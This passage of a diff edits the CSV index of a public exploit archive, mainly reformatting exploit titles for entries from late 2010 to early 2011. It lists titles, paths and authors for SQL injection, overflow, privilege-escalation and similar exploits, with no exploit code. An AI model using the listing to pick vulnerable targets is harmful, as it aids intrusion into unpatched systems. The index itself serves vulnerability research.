Injection",2010-12-02,underground-stockholm.com,asp,webapps,0 15662,platforms/linux/remote/15662.txt,"ProFTPD 1.3.3c compromised source remote root Trojan",2010-12-02,anonymous,linux,remote,21 15663,platforms/windows/local/15663.py,"MediaCoder <= 0.7.5.4797 .m3u Buffer Overflow (SEH)",2010-12-02,"Oh Yaw Theng",windows,local,0 -15664,platforms/hardware/remote/15664.txt,"iFTPStorage for iPhone / iPod touch <= 1.3 - Directory Traversal",2010-12-03,XEL,hardware,remote,0 -15665,platforms/asp/webapps/15665.txt,"Easy Travel Portal v2 (travelbycountry.asp) SQL Injection Vulnerability",2010-12-03,"Ulrik Persson",asp,webapps,0 +15664,platforms/hardware/remote/15664.txt,"iOS iFTPStorage <= 1.3 - Directory Traversal",2010-12-03,XEL,hardware,remote,0 +15665,platforms/asp/webapps/15665.txt,"Easy Travel Portal 2 - (travelbycountry.asp) SQL Injection Vulnerability",2010-12-03,"Ulrik Persson",asp,webapps,0 15666,platforms/hardware/webapps/15666.txt,"Multiple D-Link Router Models Authentication Bypass Vulnerability",2010-12-03,"Craig Heffner",hardware,webapps,0 15668,platforms/windows/remote/15668.html,"Image Viewer CP Gold 6 ActiveX TifMergeMultiFiles() Buffer Overflow",2010-12-03,Dr_IDE,windows,remote,0 15669,platforms/windows/dos/15669.py,"Mediamonkey 3.2.4.1304 (mp3) Buffer Overflow Vulnerability PoC",2010-12-04,0v3r,windows,dos,0 @@ -13596,7 +13596,7 @@ id,file,description,date,author,platform,type,port 15681,platforms/asp/webapps/15681.txt,"ASPSiteware JobPost 1.0 SQL Injection",2010-12-04,R4dc0re,asp,webapps,0 15682,platforms/asp/webapps/15682.txt,"ASPSiteware ASP Gallery 1.0 SQL Injection",2010-12-04,R4dc0re,asp,webapps,0 15683,platforms/asp/webapps/15683.txt,"ASPSiteware Contact Directory 1.0 SQL Injection",2010-12-04,R4dc0re,asp,webapps,0 -15684,platforms/php/webapps/15684.txt,"SQL injection vulnerability in do_trackbacks() Wordpress function",2010-12-05,M4g,php,webapps,0 +15684,platforms/php/webapps/15684.txt,"Wordpress do_trackbacks() function - SQL injection vulnerability",2010-12-05,M4g,php,webapps,0 15685,platforms/php/webapps/15685.html,"phpKF Forum 1.80 profil_degistir.php CSRF Exploit",2010-12-05,FreWaL,php,webapps,0 15686,platforms/asp/webapps/15686.txt,"Gatesoft Docusafe 4.1.0 SQL Injection Vulnerability",2010-12-05,R4dc0re,asp,webapps,0 15687,platforms/asp/webapps/15687.txt,"Ecommercemax Solutions Digital Goods Seller SQL Injection",2010-12-05,R4dc0re,asp,webapps,0 @@ -13630,27 +13630,27 @@ id,file,description,date,author,platform,type,port 15720,platforms/php/webapps/15720.txt,"Sulata iSoft (stream.php) Local File Disclosure Exploit",2010-12-10,Sudden_death,php,webapps,0 15721,platforms/php/webapps/15721.txt,"Joomla Component Billy Portfolio 1.1.2 Blind SQL Injection",2010-12-10,jdc,php,webapps,0 15722,platforms/multiple/dos/15722.txt,"PHP 5.3.3 NumberFormatter::getSymbol Integer Overflow",2010-12-10,"Maksymilian Arciemowicz",multiple,dos,0 -15723,platforms/freebsd/remote/15723.c,"LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit for FreeBSD",2010-12-10,Kingcope,freebsd,remote,0 +15723,platforms/freebsd/remote/15723.c,"FreeBSD LiteSpeed Web Server 4.0.17 w/ PHP - Remote Exploit",2010-12-10,Kingcope,freebsd,remote,0 15725,platforms/linux/remote/15725.pl,"Exim 4.63 Remote Root Exploit",2010-12-11,Kingcope,linux,remote,0 15727,platforms/windows/local/15727.py,"FreeAmp 2.0.7 .m3u Buffer Overflow",2010-12-11,zota,windows,local,0 15728,platforms/hardware/webapps/15728.txt,"Clear iSpot/Clearspot CSRF Vulnerabilities",2010-12-12,"Trustwave's SpiderLabs",hardware,webapps,0 15729,platforms/windows/local/15729.py,"PowerShell XP 3.0.1 Buffer Overflow 0day",2010-12-12,m_101,windows,local,0 -15730,platforms/windows/local/15730.rb,"SnackAmp 3.1.3 Malicious SMP Buffer Overflow Vulnerability (SEH)",2010-12-12,"James Fitts",windows,local,0 +15730,platforms/windows/local/15730.rb,"SnackAmp 3.1.3 - SMP Buffer Overflow Vulnerability (SEH)",2010-12-12,"James Fitts",windows,local,0 15732,platforms/linux/dos/15732.txt,"FontForge .BDF Font File Stack-Based Buffer Overflow",2010-12-14,"Ulrik Persson",linux,dos,0 -15733,platforms/windows/remote/15733.html,"Crystal Reports Viewer 12.0.0.549 Activex Exploit (PrintControl.dll) 0-day",2010-12-14,Dr_IDE,windows,remote,0 -15735,platforms/php/webapps/15735.txt,"MantisBT <=1.2.3 (db_type) Cross-Site Scripting & Path Disclosure Vulnerability",2010-12-15,LiquidWorm,php,webapps,0 -15736,platforms/php/webapps/15736.txt,"MantisBT <=1.2.3 (db_type) Local File Inclusion Vulnerability",2010-12-15,LiquidWorm,php,webapps,0 +15733,platforms/windows/remote/15733.html,"Crystal Reports Viewer 12.0.0.549 - Activex Exploit (PrintControl.dll) 0day",2010-12-14,Dr_IDE,windows,remote,0 +15735,platforms/php/webapps/15735.txt,"MantisBT <= 1.2.3 (db_type) - Cross-Site Scripting & Path Disclosure Vulnerability",2010-12-15,LiquidWorm,php,webapps,0 +15736,platforms/php/webapps/15736.txt,"MantisBT <= 1.2.3 (db_type) - Local File Inclusion Vulnerability",2010-12-15,LiquidWorm,php,webapps,0 15737,platforms/cgi/webapps/15737.txt,"Google Urchin 5.7.03 LFI Vulnerability 0day",2010-12-15,"Kristian Erik Hermansen",cgi,webapps,0 15738,platforms/windows/dos/15738.pl,"Digital Audio Editor 7.6.0.237 Local Crash PoC",2010-12-15,h1ch4m,windows,dos,0 15739,platforms/windows/dos/15739.pl,"Easy DVD Creator Local Crash PoC",2010-12-15,h1ch4m,windows,dos,0 15740,platforms/php/webapps/15740.txt,"Pointter PHP Content Management System Unauthorized Privilege Escalation",2010-12-15,"Mark Stanislav",php,webapps,0 15741,platforms/php/webapps/15741.txt,"Pointter PHP Micro-Blogging Social Network Unauthorized Privilege Escalation",2010-12-15,"Mark Stanislav",php,webapps,0 15742,platforms/php/webapps/15742.txt,"BEdita 3.0.1.2550 Multiple Vulnerabilities",2010-12-15,"High-Tech Bridge SA",php,webapps,0 -15743,platforms/php/webapps/15743.txt,"BLOG:CMS <= v4.2.1e Multiple Vulnerabilities",2010-12-15,"High-Tech Bridge SA",php,webapps,0 -15744,platforms/cgi/webapps/15744.txt,"Gitweb <=1.7.3.3 Cross Site Scripting",2010-12-15,emgent,cgi,webapps,80 +15743,platforms/php/webapps/15743.txt,"BLOG:CMS <= 4.2.1e - Multiple Vulnerabilities",2010-12-15,"High-Tech Bridge SA",php,webapps,0 +15744,platforms/cgi/webapps/15744.txt,"Gitweb <= 1.7.3.3 - Cross Site Scripting",2010-12-15,emgent,cgi,webapps,80 15745,platforms/linux/local/15745.txt,"IBM Tivoli Storage Manager (TSM) Local Root",2010-12-15,"Kryptos Logic",linux,local,0 15746,platforms/windows/remote/15746.rb,"Internet Explorer 8 CSS Parser Exploit",2010-12-15,"Nephi Johnson",windows,remote,0 -15747,platforms/windows/local/15747.py,"Aesop GIF Creator <= v2.1 (.aep) Buffer Overflow Exploit",2010-12-16,xsploitedsec,windows,local,0 +15747,platforms/windows/local/15747.py,"Aesop GIF Creator <= 2.1 - (.aep) Buffer Overflow Exploit",2010-12-16,xsploitedsec,windows,local,0 15748,platforms/php/webapps/15748.txt,"QualDev eCommerce script SQL Injection Vulnerability",2010-12-16,ErrNick,php,webapps,0 15749,platforms/php/webapps/15749.txt,"Joomla JRadio Component (com_jradio) Local File Inclusion",2010-12-16,Sid3^effects,php,webapps,0 15750,platforms/windows/dos/15750.py,"SolarFTP 2.0 Multiple Commands Denial of Service Vulnerability",2010-12-16,modpr0be,windows,dos,0 @@ -13661,23 +13661,23 @@ id,file,description,date,author,platform,type,port 15755,platforms/php/webapps/15755.txt,"Easy Online Shop SQL Injection Vulnerability",2010-12-17,"Easy Laster",php,webapps,0 15756,platforms/php/webapps/15756.txt,"MHP Downloadshop SQL Injection Vulnerability",2010-12-17,"Easy Laster",php,webapps,0 15758,platforms/win32/dos/15758.c,"Windows Win32k Pointer Dereferencement PoC (MS10-098)",2010-12-17,"Stefan LE BERRE",win32,dos,0 -15761,platforms/windows/local/15761.txt,"AhnLab V3 Internet Security 8.0 <= 1.2.0.4 Privilege Escalation Vulnerability",2010-12-17,MJ0011,windows,local,0 -15762,platforms/windows/local/15762.txt,"NProtect Anti-Virus 2007 <= 2010.5.11.1 Privilege Escalation Vulnerability",2010-12-17,MJ0011,windows,local,0 -15763,platforms/windows/local/15763.txt,"ESTsoft ALYac Anti-Virus 1.5 <= 5.0.1.2 Privilege Escalation Vulnerability",2010-12-17,MJ0011,windows,local,0 -15764,platforms/windows/local/15764.txt,"ViRobot Desktop 5.5 and Server 3.5 <=2008.8.1.1 Privilege Escalation Vulnerability",2010-12-17,MJ0011,windows,local,0 +15761,platforms/windows/local/15761.txt,"AhnLab V3 Internet Security 8.0 <= 1.2.0.4 - Privilege Escalation Vulnerability",2010-12-17,MJ0011,windows,local,0 +15762,platforms/windows/local/15762.txt,"NProtect Anti-Virus 2007 <= 2010.5.11.1 - Privilege Escalation Vulnerability",2010-12-17,MJ0011,windows,local,0 +15763,platforms/windows/local/15763.txt,"ESTsoft ALYac Anti-Virus 1.5 <= 5.0.1.2 - Privilege Escalation Vulnerability",2010-12-17,MJ0011,windows,local,0 +15764,platforms/windows/local/15764.txt,"ViRobot Desktop 5.5 and Server 3.5 <= 2008.8.1.1 - Privilege Escalation Vulnerability",2010-12-17,MJ0011,windows,local,0 15765,platforms/php/webapps/15765.txt,"CubeCart v 3.x Remote File Upload Vulnerability",2010-12-17,StunTMaN!,php,webapps,0 15766,platforms/php/webapps/15766.txt,"Radius Manager 3.8.0 Multiple XSS Vulnerabilities",2010-12-17,"Rodrigo Rubira Branco",php,webapps,0 15767,platforms/windows/dos/15767.py,"Ecava IntegraXor Remote ActiveX Buffer Overflow PoC",2010-12-18,"Jeremy Brown",windows,dos,0 15768,platforms/php/webapps/15768.txt,"MCFileManager Plugin for TinyMCE 3.2.2.3 Arbitrary File Upload Vulnerability",2010-12-18,"Vladimir Vorontsov",php,webapps,0 -15769,platforms/php/webapps/15769.txt,"Ero Auktion v2010 (item.php) SQL Injection Vulnerability",2010-12-18,"DeadLy DeMon",php,webapps,0 -15770,platforms/php/webapps/15770.txt,"Download Center v2.2 SQL injection Vulnerability",2010-12-18,"DeadLy DeMon",php,webapps,0 +15769,platforms/php/webapps/15769.txt,"Ero Auktion 2010 - (item.php) SQL Injection Vulnerability",2010-12-18,"DeadLy DeMon",php,webapps,0 +15770,platforms/php/webapps/15770.txt,"Download Center 2.2 - SQL injection Vulnerability",2010-12-18,"DeadLy DeMon",php,webapps,0 15771,platforms/php/webapps/15771.txt,"SchuldnerBeratung SQL injection Vulnerability",2010-12-18,"DeadLy DeMon",php,webapps,0 15772,platforms/php/webapps/15772.txt,"PayPal Shop Digital SQL Injection Vulnerability",2010-12-18,"DeadLy DeMon",php,webapps,0 15773,platforms/php/webapps/15773.txt,"Projekt Shop (details.php) Multiple SQL injection Vulnerabilities",2010-12-18,"DeadLy DeMon",php,webapps,0 15774,platforms/linux/local/15774.c,"Linux Kernel < 2.6.37-rc2 ACPI custom_method Privilege Escalation",2010-12-18,"Jon Oberheide",linux,local,0 15775,platforms/php/webapps/15775.txt,"Mafia Game Script SQL injection Vulnerability",2010-12-18,"DeadLy DeMon",php,webapps,0 15776,platforms/asp/webapps/15776.pl,"Virtual Store Open 3.0 Acess SQL Injection",2010-12-18,Br0ly,asp,webapps,0 -15777,platforms/asp/webapps/15777.txt,"Oto Galery v1.0 Multiple SQL Injection Vulnerabilities",2010-12-19,"DeadLy DeMon",asp,webapps,0 +15777,platforms/asp/webapps/15777.txt,"Oto Galery 1.0 - Multiple SQL Injection Vulnerabilities",2010-12-19,"DeadLy DeMon",asp,webapps,0 15779,platforms/php/webapps/15779.txt,"Joomla JE Auto Component (com_jeauto) LFI Vulnerability",2010-12-19,Sid3^effects,php,webapps,0 15781,platforms/php/webapps/15781.txt,"Inout Webmail Script Persistent XSS Vulnerability",2010-12-20,Sid3^effects,php,webapps,0 15782,platforms/windows/local/15782.pl,"Word Splash Pro <= 9.5 Buffer Overflow",2010-12-20,h1ch4m,windows,local,0 @@ -13688,10 +13688,10 @@ id,file,description,date,author,platform,type,port 15787,platforms/windows/dos/15787.py,"Accmeware MP3 Speed 5.0.9 DoS PoC",2010-12-20,0v3r,windows,dos,0 15788,platforms/windows/dos/15788.py,"Accmeware MP3 Cut 5.0.9 DoS PoC",2010-12-20,0v3r,windows,dos,0 15789,platforms/php/webapps/15789.txt,"plx Ad Trader 3.2 Authentication Bypass Vulnerability",2010-12-20,R4dc0re,php,webapps,0 -15790,platforms/php/webapps/15790.txt,"PHP Web Scripts Ad Manager Pro v3 SQL Injection",2010-12-20,R4dc0re,php,webapps,0 +15790,platforms/php/webapps/15790.txt,"PHP Web Scripts Ad Manager Pro 3.0 - SQL Injection",2010-12-20,R4dc0re,php,webapps,0 15791,platforms/php/webapps/15791.txt,"Joomla Component Jotloader 2.2.1 Local File Inclusion Vulnerability",2010-12-20,v3n0m,php,webapps,0 15792,platforms/hardware/dos/15792.php,"Apple iPhone Safari (body alink) Remote Crash",2010-12-20,"Yakir Wizman",hardware,dos,0 -15793,platforms/php/webapps/15793.txt,"Vacation Rental Script v4.0 Arbitrary File Upload Vulnerability",2010-12-20,Br0ly,php,webapps,0 +15793,platforms/php/webapps/15793.txt,"Vacation Rental Script 4.0 - Arbitrary File Upload Vulnerability",2010-12-20,Br0ly,php,webapps,0 15794,platforms/hardware/dos/15794.php,"Apple iPhone Safari (decodeURI) Remote Crash",2010-12-20,"Yakir Wizman",hardware,dos,0 15795,platforms/php/webapps/15795.txt,"Serendipity 1.5.4 0day Arbitrary File Upload Vulnerability",2010-12-21,pentesters.ir,php,webapps,0 15796,platforms/hardware/dos/15796.php,"Apple iPhone Safari (decodeURIComponent) Remote Crash",2010-12-21,"Yakir Wizman",hardware,dos,0 @@ -13711,7 +13711,7 @@ id,file,description,date,author,platform,type,port 15810,platforms/hardware/webapps/15810.txt,"D-Link WBR-1310 Authentication Bypass Vulnerability",2010-12-23,"Craig Heffner",hardware,webapps,0 15811,platforms/php/webapps/15811.txt,"Built2Go PHP Shopping SQL Injection Vulnerability",2010-12-23,Br0ly,php,webapps,0 15812,platforms/php/webapps/15812.txt,"Ypninc Realty Classifieds SQL Injection Vulnerability",2010-12-23,Br0ly,php,webapps,0 -15813,platforms/php/webapps/15813.txt,"IPN Development Handler v2.0 Multiple Vulnerabilities",2010-12-23,AtT4CKxT3rR0r1ST,php,webapps,0 +15813,platforms/php/webapps/15813.txt,"IPN Development Handler 2.0 - Multiple Vulnerabilities",2010-12-23,AtT4CKxT3rR0r1ST,php,webapps,0 15814,platforms/php/webapps/15814.txt,"Joomla Component com_ponygallery Remote File Inclusion Vulnerabilities",2010-12-23,AtT4CKxT3rR0r1ST,php,webapps,0 15815,platforms/php/webapps/15815.txt,"Joomla Component com_adsmanager Remote File Inclusion Vulnerability",2010-12-23,AtT4CKxT3rR0r1ST,php,webapps,0 15816,platforms/php/webapps/15816.txt,"CubeCart <= 3.0.4 SQL Injection Vulnerability",2010-12-23,Dr.NeT,php,webapps,0 @@ -13719,34 +13719,34 @@ id,file,description,date,author,platform,type,port 15819,platforms/php/webapps/15819.txt,"Joomla Component com_xmovie 1.0 Local File Inclusion Vulnerability",2010-12-24,KelvinX,php,webapps,0 15820,platforms/php/webapps/15820.txt,"SquareCMS 0.3.1 (post.php) SQL Injection Vulnerability",2010-12-24,cOndemned,php,webapps,0 15821,platforms/windows/dos/15821.py,"HttpBlitz Web Server Denial Of Service Exploit",2010-12-24,otoy,windows,dos,0 -15822,platforms/php/webapps/15822.html,"CubeCart 3.0.6 <= CSRF Vulnerability (Add Admin)",2010-12-24,"P0C T34M",php,webapps,0 +15822,platforms/php/webapps/15822.html,"CubeCart 3.0.6 - CSRF Vulnerability (Add Admin)",2010-12-24,"P0C T34M",php,webapps,0 15824,platforms/php/webapps/15824.txt,"Pligg 1.1.2 Blind SQL Injection and XSS Vulnerabilities",2010-12-25,"Michael Brooks",php,webapps,0 15825,platforms/php/webapps/15825.txt,"OpenAuto 1.6.3 Multiple Vulnerabilities",2010-12-25,"Michael Brooks",php,webapps,0 15826,platforms/php/webapps/15826.txt,"Traidnt Up 3.0 CSRF Vulnerability",2010-12-25,"P0C T34M",php,webapps,0 15827,platforms/php/webapps/15827.txt,"Joomla Component (com_idoblog) SQL Injection Vulnerability",2010-12-25,NOCKAR1111,php,webapps,0 -15828,platforms/php/webapps/15828.txt,"Vacation Rental Script v4.0 XSRF Vulnerability",2010-12-25,OnurTURKESHAN,php,webapps,0 +15828,platforms/php/webapps/15828.txt,"Vacation Rental Script 4.0 - CSRF Vulnerability",2010-12-25,OnurTURKESHAN,php,webapps,0 15830,platforms/php/webapps/15830.txt,"Social Engine 4.x (Music Plugin) Arbitrary File Upload Vulnerability",2010-12-25,MyDoom,php,webapps,0 15831,platforms/php/webapps/15831.txt,"LoveCMS 1.6.2 Final Multiple Local File Inclusion Vulnerabilities",2010-12-25,cOndemned,php,webapps,0 15832,platforms/php/webapps/15832.txt,"Interact 2.4.1 SQL Injection Vulnerability",2010-12-26,"IR Security",php,webapps,0 -15834,platforms/windows/remote/15834.py,"Kolibri v2.0 Buffer Overflow RET + SEH exploit (HEAD)",2010-12-26,TheLeader,windows,remote,0 -15835,platforms/php/webapps/15835.html,"pecio CMS v2.0.5 <= CSRF Add Admin",2010-12-27,"P0C T34M",php,webapps,0 -15836,platforms/php/webapps/15836.txt,"OpenEMR v3.2.0 SQL Injection and XSS",2010-12-27,Blake,php,webapps,0 +15834,platforms/windows/remote/15834.py,"Kolibri 2.0 - Buffer Overflow RET + SEH exploit (HEAD)",2010-12-26,TheLeader,windows,remote,0 +15835,platforms/php/webapps/15835.html,"pecio CMS 2.0.5 - CSRF Add Admin",2010-12-27,"P0C T34M",php,webapps,0 +15836,platforms/php/webapps/15836.txt,"OpenEMR 3.2.0 - SQL Injection and XSS",2010-12-27,Blake,php,webapps,0 15837,platforms/php/webapps/15837.txt,"Web@all <= 1.1 Remote Admin Settings Change",2010-12-27,"Giuseppe D'Inverno",php,webapps,0 15838,platforms/php/webapps/15838.php,"OpenClassifieds 1.7.0.3 Chained: Captcha Bypass->SQLi->Persistent XSS on Frontpage",2010-12-28,"Michael Brooks",php,webapps,0 15839,platforms/windows/dos/15839.php,"Microsoft Windows Fax Services Cover Page Editor (.cov) Memory Corruption",2010-12-28,rgod,windows,dos,0 -15840,platforms/php/webapps/15840.txt,"ardeaCore_v2.25 PHP Framework Remote File Inclusion",2010-12-29,n0n0x,php,webapps,0 +15840,platforms/php/webapps/15840.txt,"ardeaCore 2.25 - PHP Framework Remote File Inclusion",2010-12-29,n0n0x,php,webapps,0 15842,platforms/hardware/remote/15842.txt,"DD-WRT Information Disclosure Vulnerability",2010-12-29,"Craig Heffner",hardware,remote,0 15843,platforms/php/webapps/15843.txt,"News Script PHP Pro (fckeditor) File Upload Vulnerability",2010-12-29,Net.Edit0r,php,webapps,0 15845,platforms/windows/dos/15845.py,"IrfanView 4.27 - JP2000.dll plugin DoS",2010-12-29,BraniX,windows,dos,0 15846,platforms/php/webapps/15846.txt,"KaiBB 1.0.1 Multiple Vulnerabilities",2010-12-29,"High-Tech Bridge SA",php,webapps,0 15847,platforms/php/webapps/15847.txt,"DzTube SQL Injection Vulnerability",2010-12-29,"errnick qwe",php,webapps,0 -15848,platforms/php/webapps/15848.txt,"PHP-AddressBook v6.2.4 (group.php) SQL Injection Vulnerability",2010-12-29,hiphop,php,webapps,0 +15848,platforms/php/webapps/15848.txt,"PHP-AddressBook 6.2.4 - (group.php) SQL Injection Vulnerability",2010-12-29,hiphop,php,webapps,0 15849,platforms/php/webapps/15849.txt,"LoveCMS 1.6.2 - CSRF Code Injection Vulnerability",2010-12-29,hiphop,php,webapps,0 -15850,platforms/php/webapps/15850.html,"PiXie CMS v1.04 <= Multiple CSRF Vulnerabilities",2010-12-29,"Ali Raheem",php,webapps,0 +15850,platforms/php/webapps/15850.html,"PiXie CMS <= 1.04 - Multiple CSRF Vulnerabilities",2010-12-29,"Ali Raheem",php,webapps,0 15851,platforms/windows/dos/15851.py,"QuickTime Picture Viewer 7.6.6 JP2000 Denial of Service Vulnerability",2010-12-29,BraniX,windows,dos,0 15852,platforms/php/webapps/15852.txt,"Siteframe 3.2.3 (user.php) SQL Injection Vulnerability",2010-12-29,"AnGrY BoY",php,webapps,0 15853,platforms/php/webapps/15853.txt,"DGNews 2.1 SQL Injection Vulnerability",2010-12-29,kalashnikov,php,webapps,0 -15855,platforms/windows/local/15855.py,"Digital Music Pad v8.2.3.4.8 (.pls) SEH Overflow",2010-12-29,"Abhishek Lyall",windows,local,0 +15855,platforms/windows/local/15855.py,"Digital Music Pad 8.2.3.4.8 - (.pls) SEH Overflow",2010-12-29,"Abhishek Lyall",windows,local,0 15856,platforms/php/webapps/15856.php,"TYPO3 Unauthenticated Arbitrary File Retrieval",2010-12-29,ikki,php,webapps,0 15857,platforms/php/webapps/15857.txt,"Discovery TorrentTrader 2.6 - Multiple Vulnerabilities",2010-12-29,EsS4ndre,php,webapps,0 15858,platforms/php/webapps/15858.txt,"Wordpress 3.0.3 Stored XSS (IE7,6 NS8.1)",2010-12-29,Saif,php,webapps,0 @@ -13758,17 +13758,17 @@ id,file,description,date,author,platform,type,port 15865,platforms/php/webapps/15865.php,"Ignition 1.3 Remote Code Execution Exploit",2010-12-30,cOndemned,php,webapps,0 15866,platforms/windows/remote/15866.html,"Chilkat Software FTP2 ActiveX Component Remote Code Execution",2010-12-30,rgod,windows,remote,0 15868,platforms/windows/remote/15868.pl,"QuickPHP Web Server Arbitrary (src .php) File Download",2010-12-30,"Yakir Wizman",windows,remote,0 -15869,platforms/windows/remote/15869.txt,"CA ARCserve D2D r15 Web Service Servlet Code Execution",2010-12-30,rgod,windows,remote,0 +15869,platforms/windows/remote/15869.txt,"CA ARCserve D2D r15 Web Service Servlet Code Execution",2010-12-30,rgod,windows,remote,0 15879,platforms/windows/shellcode/15879.txt,w32-speaking-shellcode,2010-12-31,SkyLined,windows,shellcode,0 15885,platforms/windows/remote/15885.html,"HP Photo Creative 2.x audio.Record.1 ActiveX Control Remote Stack Based Buffer Overflow",2011-01-01,rgod,windows,remote,0 15886,platforms/php/webapps/15886.txt,"KLINK SQL Injection Vulnerability",2011-01-01,"Mauro Rossi and Andres Gomez",php,webapps,0 15887,platforms/php/webapps/15887.txt,"ChurchInfo <= 1.2.12 SQL Injection Vulnerability",2011-01-01,dun,php,webapps,0 15888,platforms/windows/local/15888.c,"Bywifi 2.8.1 Stack Buffer Overflow Exploit",2011-01-01,anonymous,windows,local,0 15889,platforms/php/webapps/15889.txt,"Sahana Agasti <= 0.6.4 SQL Injection Vulnerability",2011-01-01,dun,php,webapps,0 -15890,platforms/php/webapps/15890.txt,"Tech Shop Technote 7 SQL Injection Vulnerability",2011-01-01,MaJ3stY,php,webapps,0 +15890,platforms/php/webapps/15890.txt,"Tech Shop Technote 7 SQL Injection Vulnerability",2011-01-01,MaJ3stY,php,webapps,0 15891,platforms/php/webapps/15891.txt,"GALLARIFIC PHP Photo Gallery Script (gallery.php) SQL Injection",2011-01-02,AtT4CKxT3rR0r1ST,php,webapps,0 -15892,platforms/php/webapps/15892.html,"YourTube v1.0 CSRF Vulnerability (Add User)",2011-01-02,AtT4CKxT3rR0r1ST,php,webapps,0 -15893,platforms/php/webapps/15893.py,"Amoeba CMS v1.01 multiple remote vulnerabilities",2011-01-02,mr_me,php,webapps,0 +15892,platforms/php/webapps/15892.html,"YourTube 1.0 - CSRF Vulnerability (Add User)",2011-01-02,AtT4CKxT3rR0r1ST,php,webapps,0 +15893,platforms/php/webapps/15893.py,"Amoeba CMS 1.01 - Multiple Remote Vulnerabilities",2011-01-02,mr_me,php,webapps,0 15894,platforms/windows/dos/15894.c,"MS10-073 Windows Class Handling Vulnerability",2011-01-02,"Tarjei Mandt",windows,dos,0 15895,platforms/windows/local/15895.py,"CoolPlayer 2.18 DEP Bypass",2011-01-02,Blake,windows,local,0 15896,platforms/php/webapps/15896.txt,"Sahana Agasti <= 0.6.4 Multiple Remote File Inclusion",2011-01-03,n0n0x,php,webapps,0 @@ -13777,9 +13777,9 @@ id,file,description,date,author,platform,type,port 15901,platforms/windows/local/15901.py,"Music Animation Machine MIDI Player SEH BOF",2011-01-04,Acidgen,windows,local,0 15902,platforms/php/webapps/15902.html,"S40 CMS 0.4.1 Change Admin Passwd CSRF Exploit",2011-01-04,pentesters.ir,php,webapps,0 15905,platforms/windows/dos/15905.py,"Xynph 1.0 USER Denial of Service Exploit",2011-01-04,freak_out,windows,dos,0 -15907,platforms/php/webapps/15907.txt,"Nucleus v3.61 Multiple Remote File Include",2011-01-05,n0n0x,php,webapps,0 +15907,platforms/php/webapps/15907.txt,"Nucleus 3.61 - Multiple Remote File Include",2011-01-05,n0n0x,php,webapps,0 15913,platforms/php/webapps/15913.pl,"PhpGedView <= 4.2.3 Local File Inclusion Vulnerability",2011-01-05,dun,php,webapps,0 -15915,platforms/php/webapps/15915.py,"Concrete CMS v5.4.1.1 XSS/Remote Code Execution Exploit",2011-01-05,mr_me,php,webapps,0 +15915,platforms/php/webapps/15915.py,"Concrete CMS 5.4.1.1 - XSS/Remote Code Execution Exploit",2011-01-05,mr_me,php,webapps,0 15916,platforms/linux/local/15916.c,"Linux Kernel CAP_SYS_ADMIN to root Exploit",2011-01-05,"Dan Rosenberg",linux,local,0 15917,platforms/php/webapps/15917.txt,"Ignition 1.3 (comment.php) Local File Inclusion Vulnerability",2011-01-06,n0n0x,php,webapps,0 15918,platforms/jsp/webapps/15918.txt,"Openfire 3.6.4 Multiple CSRF Vulnerabilities",2011-01-06,"Riyaz Ahemed Walikar",jsp,webapps,0 @@ -13792,11 +13792,11 @@ id,file,description,date,author,platform,type,port 15925,platforms/windows/dos/15925.txt,"StageTracker 2.5 Denial of Service Vulnerability",2011-01-07,freak_out,windows,dos,0 15934,platforms/windows/local/15934.py,"BS.Player 2.57 Buffer Overflow Exploit (Unicode SEH)",2011-01-07,"C4SS!0 G0M3S",windows,local,0 15935,platforms/linux/dos/15935.c,"GNU libc/regcomp(3) Multiple Vulnerabilities",2011-01-07,"Maksymilian Arciemowicz",linux,dos,0 -15936,platforms/windows/local/15936.py,"VideoSpirit Pro <= v1.68 Local BoF Exploit",2011-01-08,xsploitedsec,windows,local,0 +15936,platforms/windows/local/15936.py,"VideoSpirit Pro <= 1.68 - Local BoF Exploit",2011-01-08,xsploitedsec,windows,local,0 15937,platforms/multiple/remote/15937.pl,"NetSupport Manager Agent Remote Buffer Overflow",2011-01-08,ikki,multiple,remote,0 15938,platforms/php/webapps/15938.txt,"axdcms-0.1.1 Local File Include Vulnerbility",2011-01-08,n0n0x,php,webapps,0 15939,platforms/php/webapps/15939.txt,"Elxis CMS 2009.2 Remote file include vulnerbility",2011-01-08,n0n0x,php,webapps,0 -15940,platforms/windows/dos/15940.pl,"HP Data Protector Manager v6.11 Remote DoS in RDS Service",2011-01-08,Pepelux,windows,dos,0 +15940,platforms/windows/dos/15940.pl,"HP Data Protector Manager 6.11 - Remote DoS in RDS Service",2011-01-08,Pepelux,windows,dos,0 15941,platforms/windows/local/15941.py,"Winamp 5.5.8 (in_mod plugin) Stack Overflow Exploit (SEH)",2011-01-08,fdisk,windows,local,0 15942,platforms/php/webapps/15942.txt,"Sahana Agasti <= 0.6.5 Multiple Vulnerabilities",2011-01-08,dun,php,webapps,0 15943,platforms/php/webapps/15943.txt,"Mingle Forum (WordPress Plugin) <= 1.0.26 Multiple Vulnerabilities",2011-01-08,"Charles Hooper",php,webapps,0 @@ -13810,7 +13810,7 @@ id,file,description,date,author,platform,type,port 15961,platforms/php/webapps/15961.txt,"TinyBB 1.2 SQL Injection Vulnerability",2011-01-10,Aodrulez,php,webapps,0 15962,platforms/solaris/local/15962.c,"LOCAL SOLARIS KERNEL ROOT EXPLOIT (< 5.10 138888-01)",2011-01-10,peri.carding,solaris,local,0 15963,platforms/windows/remote/15963.rb,"MS10-081: Windows Common Control Library (Comctl32) Heap Overflow",2011-01-10,"Nephi Johnson",windows,remote,0 -15964,platforms/php/webapps/15964.py,"Lotus CMS Fraise v3.0 LFI - Remote Code Execution Exploit",2011-01-10,mr_me,php,webapps,0 +15964,platforms/php/webapps/15964.py,"Lotus CMS Fraise 3.0 - LFI - Remote Code Execution Exploit",2011-01-10,mr_me,php,webapps,0 15966,platforms/php/webapps/15966.txt,"ExtCalendar 2 (calendar.php) SQL Injection Vulnerability",2011-01-11,"Lagripe-Dz and Mca-Crb",php,webapps,0 15967,platforms/php/webapps/15967.txt,"Energine 2.3.8 Multiple Vulnerabilities",2011-01-11,"High-Tech Bridge SA",php,webapps,0 15968,platforms/php/webapps/15968.txt,"VaM Shop 1.6 Multiple Vulnerabilities",2011-01-11,"High-Tech Bridge SA",php,webapps,0 @@ -13831,11 +13831,11 @@ id,file,description,date,author,platform,type,port 15989,platforms/php/webapps/15989.txt,"People Joomla Component 1.0.0 SQL Injection Vulnerability",2011-01-14,"Salvatore Fresta",php,webapps,0 15991,platforms/windows/remote/15991.html,"Real Networks RealPlayer SP 'RecordClip' Method Remote Code Execution",2011-01-14,"Sean de Regge",windows,remote,0 15992,platforms/windows/dos/15992.txt,"Sielco Sistemi Winlog <= 2.07.00 Stack Overflow",2011-01-14,"Luigi 